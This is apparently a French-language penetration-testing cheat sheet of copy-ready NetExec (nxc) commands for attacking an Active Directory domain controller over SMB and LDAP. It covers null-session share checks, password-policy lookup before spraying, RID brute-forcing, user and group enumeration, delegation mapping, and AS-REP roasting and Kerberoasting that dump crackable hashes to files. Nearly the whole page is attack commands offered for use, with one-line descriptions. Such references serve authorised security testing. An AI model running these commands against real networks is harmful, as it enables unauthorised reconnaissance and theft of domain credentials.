Copy command
nxc smb $DC -u '' -p '' --sharesDescription: Test null session : mesure d'exposition avant d'avoir des creds.
Information Gathering
NetExec (nxc)
Enum AD via SMB et LDAP : du null session initial au mapping complet du domaine.
Accès & Policy
Copy command
nxc smb $DC -u $USER -p $PASS --pass-polDescription: Politique de mot de passe : lockout threshold avant tout spray.
Copy command
nxc smb $DC -u $USER -p $PASS --local-auth --rid-bruteDescription: RID brute pour énumérer utilisateurs sans LDAP.
Utilisateurs & Groupes
Copy command
nxc smb $DC -u $USER -p $PASS --usersDescription: Liste rapide des comptes via RPC.
Copy command
nxc smb $DC -u $USER -p $PASS --groupsDescription: Groupes du domaine : première piste vers les chemins de privilèges.
Copy command
nxc ldap $DC -u $USER -p $PASS --admin-countDescription: Objets protégés AdminSDHolder : cibles sensibles à traiter en priorité.
Copy command
nxc ldap $DC -u $USER -p $PASS --active-usersDescription: Filtrer uniquement les comptes actifs, retirer le bruit des désactivés.
Délégation & Tickets
Copy command
nxc ldap $DC -u $USER -p $PASS --trusted-for-delegationDescription: Comptes et machines en délégation unconstrained : TGTs capturables.
Copy command
nxc ldap $DC -u $USER -p $PASS --find-delegationDescription: Cartographier toutes les délégations : unconstrained, constrained, RBCD.
Copy command
nxc ldap $DC -u $USER -p $PASS --asreproast /tmp/asrep.txtDescription: Comptes sans pré-auth Kerberos : AS-REP roastables.
Copy command
nxc ldap $DC -u $USER -p $PASS --kerberoasting /tmp/kerb.txtDescription: Comptes SPN : TGS extractables pour crack offline.